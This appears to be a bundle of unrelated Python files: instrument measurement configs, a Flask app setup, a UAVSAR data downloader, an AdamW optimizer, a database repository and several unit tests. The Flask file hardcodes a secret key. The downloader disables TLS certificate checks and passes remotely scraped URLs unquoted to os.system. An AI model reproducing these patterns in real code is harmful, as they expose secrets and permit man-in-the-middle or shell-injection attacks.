process_meas["interval_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "sec", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "intv_time",
"control": None,
}
y_data.append("interval_time")
process_meas["live_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "live_time",
"control": None,
}
y_data.append("live_time")
process_meas["dead_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dead_time",
"control": None,
}
y_data.append("dead_time")
process_meas["raw_counts_lower"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "raw_cnts_lo",
"control": None,
}
y_data.append("raw_counts_lower")
process_meas["raw_counts_higher"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "raw_cnts_hi",
"control": None,
}
y_data.append("raw_counts_higher")
process_meas["error"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"parse_label": "err",
"control": None,
}
y_data.append("error")
process_meas["error_string"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "string", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "err_string",
"control": None,
}
# y_data.append("mcpc_sample_flow")
info_meas = dict()
info_meas['magic_datetime'] = {
'dimensions': {
'axes': ['TIME'],
'unlimited': 'TIME',
'units': ['dateTime'],
},
'units': 'dateTime', # should be cfunits or udunits
'uncertainty': 0.2,
'source': 'calculated',
'data_type': 'NUMERIC',
# 'short_name': 'int_conc',
# 'parse_label': 'scan_max_volts',
'control': None,
}
info_meas["serial_number"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "ser_num",
"control": None,
}
# y_data.append('pops_datetime')
# y_data.append("mcpc_saturator_flow")
# TODO: add settings controls
controls = dict()
# controls["mcpc_power_control"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "MCPC power",
# "parse_label": "mcpcpwr",
# "control_group": "Power",
# }
# controls["mcpc_pump_power_control"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "MCPC pump power",
# "parse_label": "mcpcpmp",
# "control_group": "Power",
# }
# controls["sheath_flow_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "liters min-1",
# "allowed_range": [0, 4],
# "default_value": 2.5,
# "label": "Sheath Flow",
# "parse_label": "sheath_sp",
# "control_group": "Flows",
# }
# y_data.append("sheath_flow_sp")
# # TODO: add settings controls
# controls["number_bins"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 100],
# "default_value": 30,
# "label": "Number of bins",
# "parse_label": "num_bins",
# "control_group": "Scan Settings",
# }
# controls["bin_time"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "sec",
# "allowed_range": [0.25, 60],
# "default_value": 1,
# "label": "Seconds per bin",
# "parse_label": "bin_time",
# "control_group": "Scan Settings",
# }
# controls["scan_type"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 2],
# "default_value": 0,
# "label": "Scan type",
# "parse_label": "scan_type",
# "control_group": "Scan Settings",
# }
# controls["max_diameter_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "nm",
# "allowed_range": [10, 300],
# "default_value": 300,
# "label": "Max Dp",
# "parse_label": "scan_max_dia",
# "control_group": "Scan Settings",
# }
# controls["min_diameter_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "nm",
# "allowed_range": [10, 300],
# "default_value": 10,
# "label": "Min Dp",
# "parse_label": "scan_min_dia",
# "control_group": "Scan Settings",
# }
# controls["plumbing_time"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "sec",
# "allowed_range": [0, 10],
# "default_value": 1.2,
# "label": "Plumbing time",
# "parse_label": "plumbing_time",
# "control_group": "Scan Settings",
# }
# controls["mcpc_a_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 1,
# "label": "MCPC A installed",
# "parse_label": "mcpc_a_yn",
# "control_group": "Hardware Settings",
# }
# controls["mcpc_b_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 00,
# "label": "MCPC B installed",
# "parse_label": "mcpc_b_yn",
# "control_group": "Hardware Settings",
# }
# controls["mcpc_b_flow_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "liters min-1",
# "allowed_range": [0, 2],
# "default_value": 0.36,
# "label": "MCPC B flow",
# "parse_label": "mcpc_b_flw",
# "control_group": "Hardware Settings",
# }
# controls["sample_rh_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "Sample RH installed",
# "parse_label": "samp_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["sheath_rh_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "Sheath RH installed",
# "parse_label": "sheath_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["column_type"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 2],
# "default_value": 1,
# "label": "Column type",
# "parse_label": "sheath_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["sheath_c2"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -1562.3,
# "default_value": -5063.00,
# "label": "Sheath C2",
# "parse_label": "sheath_c2",
# "control_group": "Calibration",
# }
# controls["sheath_c1"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 1556.5,
# "default_value": 1454.50,
# "label": "Sheath C1",
# "parse_label": "sheath_c1",
# "control_group": "Calibration",
# }
# controls["sheath_c0"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -5603.2,
# "default_value": -5773.00,
# "label": "Sheath C0",
# "parse_label": "sheath_c0",
# "control_group": "Calibration",
# }
# controls["cal_temp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 27.2,
# "default_value": 30.6,
# "label": "Calibration T",
# "parse_label": "cal_temp",
# "control_group": "Calibration",
# }
# controls["imp_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 2329,
# "default_value": 2329.5,
# "label": "Impactor slope",
# "parse_label": "impct_slp",
# "control_group": "Calibration",
# }
# controls["imp_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -679,
# "default_value": -935.7,
# "label": "Impactor offset",
# "parse_label": "impct_off",
# "control_group": "Calibration",
# }
# controls["pressure_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 3885.9,
# "default_value": 3940.0,
# "label": "Pressure slope",
# "parse_label": "press_slp",
# "control_group": "Calibration",
# }
# controls["pressure_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -1266.3,
# "default_value": -1791.0,
# "label": "Pressure offset",
# "parse_label": "press_off",
# "control_group": "Calibration",
# }
# controls["hv_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 1491.1,
# "default_value": 1494.0,
# "label": "HV slope",
# "parse_label": "hv_slope",
# "control_group": "Calibration",
# }
# controls["hv_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 776.2,
# "default_value": 782.8,
# "label": "HV offset",
# "parse_label": "hv_offset",
# "control_group": "Calibration",
# }
# controls["ext_volts_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# "default_value": 4841.0,
# "label": "ExtVolts slope",
# "parse_label": "ext_volts_slope",
# "control_group": "Calibration",
# }
# controls["ext_volts_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# "default_value": -4713.0,
# "label": "ExtVolts offset",
# "parse_label": "ext_volts_offset",
# "control_group": "Calibration",
# }
measurement_config["primary"] = primary_meas
measurement_config["process"] = process_meas
measurement_config["info"] = info_meas
# measurement_config["controls"] = controls
definition["measurement_config"] = measurement_config
plot_config = dict()
time_series1d = dict()
time_series1d["app_type"] = "TimeSeries1D"
time_series1d["y_data"] = y_data
time_series1d["default_y_data"] = ["concentration"]
source_map = {
"default": {
"y_data": {"default": y_data},
"default_y_data": ["concentration"],
},
}
time_series1d["source_map"] = source_map
# size_dist['dist_data'] = dist_data
# size_dist['default_dist_data'] = ['size_distribution']
plot_config["plots"] = dict()
plot_config["plots"]["main_ts1d"] = time_series1d
definition["plot_config"] = plot_config
return {"DEFINITION": definition}
# DAQ.daq_definition['DEFINITION'] = definition
# return DAQ.daq_definition
|
"""
Package: app
Package for the application models and services
This module also sets up the logging to be used with gunicorn
"""
import logging
from flask import Flask
from .models import Inventory, DataValidationError
# Create Flask application
app = Flask(__name__)
app.config['SECRET_KEY'] = 'please, tell nobody... Shhhh'
app.config['LOGGING_LEVEL'] = logging.INFO
import service
# Set up logging for production
#print ('Setting up logging for {}...'.format(__name__))
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
if gunicorn_logger:
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
app.logger.info('Logging established')
@app.before_first_request
def init_db(dbname="inventory"):
""" Initlaize the model """
Inventory.init_db(dbname)
|
#!/usr/bin/env python
# coding: utf-8
'''UAV SAR Download API
Software for Earth Big Data Processing, Prediction Modeling and Organzation (SEPPO)
(c) 2020 Earth Big Data LLC
Author: Josef Kellndorfer,
Date: 2020-01-30
'''
from __future__ import print_function
try:
from urllib.request import urlopen # Python 3
# print('Python 3')
except:
from urllib2 import urlopen # Python >= 2.7
# print('Python 2')
import os,sys
dl_tries=5 # Hardcode on how many times curl tries to download
def myargsgarse(a):
import argparse
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter):
pass
thisprog=os.path.basename(a[0])
epilog='''
\r************
\r* Examples *
\r************
\r**** LIST all data takes
\r{thisprog} -ldt
\r{thisprog} -ldt --campaign NISARA
\r{thisprog} -ldt --campaign NISARA --site 06800
\r**** Download all datatakes for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --DryRun
\r**** Download specific datatakes for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --datatakes 19043_002 19070_004 --DryRun
\r**** Download all datatakes and dems for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --dem 0 --DryRun
\r**** Download all datatakes and dem from third data take for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --dem 3 --DryRun
\r**** Download all datatakes and dem from third data take for a campaign and site and selected polarizations
\r{thisprog} -campaign NISARA --site 13905 -dem 1 -p HHHH VVVV HVHV --DryRun
'''.format(thisprog=thisprog)
p = argparse.ArgumentParser(prog=thisprog,description="Earth Big Data's download API for UAVSAR data",epilog=epilog,formatter_class=CustomFormatter)
p.add_argument("-u","--urlroot",required=False, help="ASF DAAC or JPL URLROOT", action='store',default='https://uavsar.asf.alaska.edu')
p.add_argument("-i","--index_file",required=False, help="Locally stored index_file", action='store',default=os.path.join(os.environ['HOME'],'.uavsar','index.html'))
p.add_argument("-d","--datatakes",required=False, nargs='*', help="List of datatakes. If none, get all. Can be any substring after the 'campaign_site' portion of the data take name", action='store',default=None)
p.add_argument("-s","--site",required=False, help="UAVSAR Site code e.g. 06800'",action='store',default='')
p.add_argument("-c","--campaign",required=False, help="NISAR Campaign, .e.g. 'NISARA'",action='store',default='')
p.add_argument("-p","--polarizations", nargs='*',required=False, help="Polariztions",action='store',default=['HHHH','HVHV'])
p.add_argument("-t","--image_types",required=False, nargs='+',help="Image Types",action='store',default=['mlc'],choices=['mlc','slc','grd'])
p.add_argument("-dem","--dem",required=False, help="Download DEM Number from site, number indicates which time step to get, 0 download all. Defaults to no dem download",action='store',default=None,type=int)
p.add_argument("-na","--no_annotation",required=False, help="Do not download the annotationfile .ann",action='store_true',default=False)
p.add_argument("-l","--list_only",required=False, help="only list the urls, do not download",action='store_true',default=False)
p.add_argument("-ldt","--list_datatakes",required=False, help="List all data takes. Can be combined with --campaign --site",action='store_true',default=False)
p.add_argument("-r","--rebuild_index",required=False, help="Rebuilds the local index file from -u",action='store_true',default=False)
p.add_argument("-dryrun","--DryRun",required=False, help="DryRun",action='store_true',default=False)
p.add_argument("-v","--verbose",required=False, help="Verbose output",action='store_true',default=False)
p.add_argument("outdir_root",nargs='?',help="Output directory root. Sub-directories with campain_site will be generated",default=os.path.join(os.environ['HOME'],'Downloads','UAVSAR'))
args=p.parse_args(a[1:])
if not args.site and not args.campaign and not args.list_datatakes:
print('Need --site and --campaign or --list_datatakes.\nFor help:\n{} -h'.format(thisprog))
sys.exit(1)
return args
def rebuild_index(args):
'''Connects to ASF DAAC or JPL to retrieve the top level index.html file
which will be parsed to retrieve a list of all campaings and sites'''
urlroot=args.urlroot
with urlopen(urlroot) as res:
res2=res.read().decode()
if not os.path.exists(os.path.dirname(args.index_file)):
os.makedirs(os.path.dirname(args.index_file))
with open(args.index_file,"w") as f:
f.write(res2)
def get_datatakes_from_index(idx_file):
'''reads the local index.html file
which will be parsed to retrieve a lists of all campaings and sites'''
with open(idx_file,"r") as f:
lines=f.readlines()
uavsar_takes=[x.split('href="')[1].split('/')[0] for x in lines if x.find('href="UA')>-1]
return uavsar_takes
def get_download_urls(datatakes,args):
urlroot =args.urlroot
datatake_list=args.datatakes
campaign =args.campaign
site =args.site
polarizations=args.polarizations
image_types =args.image_types
no_ann =args.no_annotation
dem_datatake =args.dem
campaign_site=campaign+'_'+site
dt = [x for x in datatakes if x.find(campaign_site)>-1]
if datatake_list:
dt = [x for x in dt if [y for y in datatake_list if x.find(y) > -1]]
allfiles={}
j=0
try:
for d in dt:
res = urlopen('/'.join([urlroot,d]))
res2=res.read().decode()
res.close()
res=None
dt_urls = ['/'.join([urlroot,d,x.split('">')[0]]) for x in res2.split('href="') if x.startswith(campaign_site)]
if dt_urls:
j+=1
download_dem=False
if dem_datatake!=None and (dem_datatake==0 or j==dem_datatake):
download_dem=True
dem_ann=[]
if download_dem: dem_ann.append('hgt')
if not no_ann: dem_ann.append('ann')
if args.polarizations:
final_files=[x for x in dt_urls if os.path.splitext(x)[1].replace('.','') in image_types]
final_files=[x for x in final_files if [y for y in args.polarizations if x.find(y)>-1]]
final_files+=[x for x in dt_urls if os.path.splitext(x)[1].replace('.','') in dem_ann]
final_files.sort()
allfiles[d]=final_files
return allfiles
except Exception as e:
raise RuntimeError(e)
def download(dl_urls,outdir_root,campaign_site,DryRun=False,verbose=False):
if DryRun:
print("***** DRYRUN: No download. Would attempt to download files for {} datatakes".format(len(dl_urls)))
try:
outdir=os.path.join(outdir_root,campaign_site)
if verbose or DryRun:
print('Download Directory (created if not existing):',outdir)
if not DryRun:
if not os.path.exists(outdir):
os.makedirs(outdir)
# download command --wget works, curl does not.
# dl_verbose ='-v' if verbose else '-s'
#getcmd = 'curl --fail --retry {} {} -C - -k -o'.format(dl_tries,dl_verbose)
dl_verbose ='-v' if verbose else '-q'
getcmd = 'wget -t {} {} -c --no-check-certificate -O'.format(dl_tries,dl_verbose)
for d in dl_urls:
outdir_d = os.path.join(outdir,d)
if not DryRun:
if not os.path.exists(outdir_d):
os.makedirs(outdir_d)
for url in dl_urls[d]:
outfile=os.path.join(outdir_d,os.path.basename(url))
cmd='{} {} {}'.format(getcmd,outfile,url).rstrip('\n')
if verbose or DryRun:
print('Downloading',url)
if not DryRun:
print(cmd)
os.system(cmd)
except Exception as e:
raise RuntimeError(e)
def list_data_takes(datatakes,args):
dt=datatakes
if args.campaign:
dt = [x for x in dt if x.split('_')[1]==args.campaign]
if args.site:
dt = [x for x in dt if x.split('_')[2]==args.site]
for i in dt:
if args.datatakes:
if [x for x in args.datatakes if i.find(x) > -1]:
print(i)
else:
print(i)
def processing(args):
if args.rebuild_index or not os.path.exists(args.index_file):
print('Building UAVSAR datatake index locally:',args.index_file)
sys.stdout.flush()
rebuild_index(args)
datatakes=get_datatakes_from_index(args.index_file)
if args.list_datatakes:
list_data_takes(datatakes,args)
sys.exit(1)
dl_urls=get_download_urls(datatakes,args)
if args.list_only:
for i in dl_urls:
print(i)
for url in dl_urls[i]:
print(url)
sys.exit(1)
campaign =args.campaign
site =args.site
campaign_site=campaign+'_'+site
download(dl_urls,args.outdir_root,campaign_site,DryRun=args.DryRun,verbose=args.verbose)
def main(a):
args=myargsgarse(a)
processing(args)
if __name__ == '__main__':
main(sys.argv)
|
# * Optimizer: Adamw
# Referenced the 3rd-party codes.
#-*- coding: utf-8 -*
import math
import torch
from torch.optim.optimizer import Optimizer
class AdamW(Optimizer):
"""Implements Adam algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, amsgrad=False):
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, amsgrad=amsgrad)
#super(AdamW, self).__init__(params, defaults)
super().__init__(params, defaults) #
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.addcdiv_(-step_size, exp_avg, denom)
p.data.sub_(decayed_weights)
else:
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
|
"""Provides functionality for performing database operations on search related tables."""
import typing
import fastapi
import sqlalchemy.orm
import auth.authentication
import models.database
import models.payment
import models.search
import schemas.payment
import schemas.search
class SearchRepository:
"""Class for performing database operations on Searches."""
db: sqlalchemy.orm.Session
def __init__(self, session: sqlalchemy.orm.Session = fastapi.Depends(models.database.get_session)):
"""Initialize the repository with a session provided by Dependency Injection."""
self.db = session
def create_search(self, search_input: schemas.search.SearchBase, exact_matches: typing.List[str],
similar_matches: typing.List[str], user: auth.authentication.User,
payment: schemas.payment.Payment):
"""Write a search and its results to the database."""
model = models.search.Search(criteria=search_input.criteria, type_code=search_input.type, user_id=user.user_id,
account_id=user.account_id)
model.payment = models.payment.Payment(id=payment.id, method=payment.method, status=payment.status)
for match in exact_matches:
model.results.append(models.search.SearchResult(registration_number=match, exact=True, selected=True))
for match in similar_matches:
model.results.append(models.search.SearchResult(registration_number=match, exact=False, selected=False))
self.db.add(model)
self.db.flush()
self.db.refresh(model)
return model
def get_search(self, search_id: int):
"""Retrieve a search from the database."""
return self.db.query(models.search.Search).filter(models.search.Search.id == search_id).first()
|
from collections.abc import Iterable
from google.transit import gtfs_realtime_pb2 as gtfs_realtime
from gtfs_realtime_translators.factories import TripUpdate, FeedMessage
def test_models_schema_output():
entity_id = '1'
arrival_time = 1234
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
trip_update = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
entities = [ trip_update ]
message = FeedMessage.create(entities=entities)
assert type(message) == gtfs_realtime.FeedMessage
assert type(message.header) == gtfs_realtime.FeedHeader
assert isinstance(message.entity, Iterable)
assert len(message.entity) == 1
entity = message.entity[0]
assert type(entity) == gtfs_realtime.FeedEntity
trip_update = entity.trip_update
assert type(trip_update) == gtfs_realtime.TripUpdate
assert isinstance(trip_update.stop_time_update, Iterable)
assert len(trip_update.stop_time_update) == 1
assert isinstance(trip_update.trip, gtfs_realtime.TripDescriptor)
stop_time_update = trip_update.stop_time_update[0]
assert type(stop_time_update) == gtfs_realtime.TripUpdate.StopTimeUpdate
assert type(stop_time_update.arrival) == gtfs_realtime.TripUpdate.StopTimeEvent
assert type(stop_time_update.departure) == gtfs_realtime.TripUpdate.StopTimeEvent
def test_departure_time_is_used_if_available():
entity_id = '1'
arrival_time = 1234
departure_time = 2345
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
entity = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
departure_time=departure_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
assert entity.trip_update.stop_time_update[0].arrival.time == arrival_time
assert entity.trip_update.stop_time_update[0].departure.time == departure_time
def test_arrival_time_is_used_if_no_departure_time():
entity_id = '1'
arrival_time = 1234
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
entity = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
assert entity.trip_update.stop_time_update[0].arrival.time == arrival_time
assert entity.trip_update.stop_time_update[0].departure.time == arrival_time
|
#
# Vortex OpenSplice
#
# This software and documentation are Copyright 2006 to TO_YEAR ADLINK
# Technology Limited, its affiliated companies and licensors. All rights
# reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Created on Dec 27, 2017
@author: prismtech
'''
import unittest
from dds import Listener, DomainParticipant, Qos, DurabilityQosPolicy, DDSDurabilityKind, DDSException,\
DeadlineQosPolicy, DDSDuration, LivelinessQosPolicy, DDSLivelinessKind,\
OwnershipQosPolicy, DDSOwnershipKind, ResourceLimitsQosPolicy,\
DestinationOrderQosPolicy, DDSDestinationOrderKind, DDSTime,\
PublicationMatchedStatus, SubscriptionMatchedStatus,\
OfferedDeadlineMissedStatus, OfferedIncompatibleQosStatus, QosPolicyId,\
LivelinessLostStatus, LivelinessChangedStatus, RequestedDeadlineMissedStatus,\
RequestedIncompatibleQosStatus, SampleRejectedStatus,\
DDSSampleRejectedStatusKind, SampleLostStatus
import ddsutil
import os
import threading
import time
from symbol import nonlocal_stmt
import collections
Info = collections.namedtuple('Info', ['name', 'type'])
class TestListeners(unittest.TestCase):
idl_path = os.path.join('idl', 'Shapes.idl')
shape_type_name = 'ShapeType'
time_out = 10.0
def _check_status(self, status, type, field_info):
self.assertIsInstance(status, type, 'status is not {}'.format(type))
self.assertEqual(len(field_info), len(type._fields), 'incorrect number of field_info entries')
for n, t in field_info:
self.assertTrue(hasattr(status,n), 'status does not have attr {}'.format(n))
self.assertIsInstance(getattr(status,n), t, 'status.{} is not a {}'.format(n,t))
def test_on_data_available(self):
topic_name = 'ST_on_data_available'
event = threading.Event()
dp1 = DomainParticipant()
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
t1 = gci.register_topic(dp1, topic_name)
wr1 = dp1.create_datawriter(t1)
class L(Listener):
def on_data_available(self,_):
event.set()
dp2 = DomainParticipant()
t2 = gci.register_topic(dp2, topic_name)
rd2 = dp2.create_datareader(t2,listener=L())
data = ShapeType(color='RED',x=1,y=2,z=3,t=Inner(foo=4))
wr1.write(data)
self.assertTrue(event.wait(self.time_out),'Did not receive on_data_available')
def test_on_inconsistent_topic(self):
'''
from: osplo/testsuite/dbt/api/dcps/c99/utest/listener/code/listener_utests.c
It's not that easy for OpenSplice to generate inconsistent_topic
events. However, it is build on top of SAC and it works on that
language binding. We can assume that this test succeeds when
the other listener test pass as well...
So, we will just check that the listener's actually got installed
'''
topic_name = 'ST_on_inconsistent_topic'
event = threading.Event()
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
# gci2 = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name + '2')
class L(Listener):
def on_inconsistent_topic(self, topic, status):
print('on_inconsistent_topic triggered: topic name = {}, total_count = {}, total_change_count = {}'
.format(topic.get_name(), status.total_coutn, status.total_change_count))
event.set()
dp1 = DomainParticipant(listener=L())
self.assertIsNotNone(dp1.listener, "DomainParticipant Listener was not set")
t1 = gci.register_topic(dp1, topic_name, listener=L())
self.assertIsNotNone(t1.listener, "Topic Listener was not set")
# t2qos = Qos([DurabilityQosPolicy(DDSDurabilityKind.PERSISTENT)])
# try:
# t2 = gci2.register_topic(dp2, topic_name, qos=None)
# self.fail("expected this topic registeration to fail")
# except DDSException as e:
# pass
#
# try:
# self.assertTrue(self.event.wait(self.time_out),'Did not receive on_inconsistent_topic')
# finally:
# pass
def test_data_available_listeners(self):
dp_on_data_available_event = threading.Event()
dp_on_publication_matched_event = threading.Event()
dp_on_subscription_matched_event = threading.Event()
p_on_publication_matched_event = threading.Event()
s_on_data_available_event = threading.Event()
s_on_subscription_matched_event = threading.Event()
wr_on_publication_matched_event = threading.Event()
rd_on_data_available_event = threading.Event()
rd_on_subscription_matched_event = threading.Event()
opm_event = threading.Event()
osm_event = threading.Event()
oda_event = threading.Event()
pub_match_status = None
sub_match_status = None
class DPL(Listener):
def on_data_available(self,reader):
dp_on_data_available_event.set()
oda_event.set()
def on_publication_matched(self,writer,status):
dp_on_publication_matched_event.set()
opm_event.set()
def on_subscription_matched(self,reader,status):
dp_on_subscription_matched_event.set()
osm_event.set()
class PL(Listener):
def on_publication_matched(self,writer, status):
p_on_publication_matched_event.set()
class SL(Listener):
def on_data_available(self,reader):
s_on_data_available_event.set()
oda_event.set()
def on_subscription_matched(self,reader, status):
s_on_subscription_matched_event.set()
osm_event.set()
class WL(Listener):
def on_publication_matched(self,writer, status):
nonlocal pub_match_status
pub_match_status = status
wr_on_publication_matched_event.set()
opm_event.set()
class RL(Listener):
def on_data_available(self,reader):
rd_on_data_available_event.set()
oda_event.set()
def on_subscription_matched(self,reader, status):
nonlocal sub_match_status
sub_match_status = status
rd_on_subscription_matched_event.set()
osm_event.set()
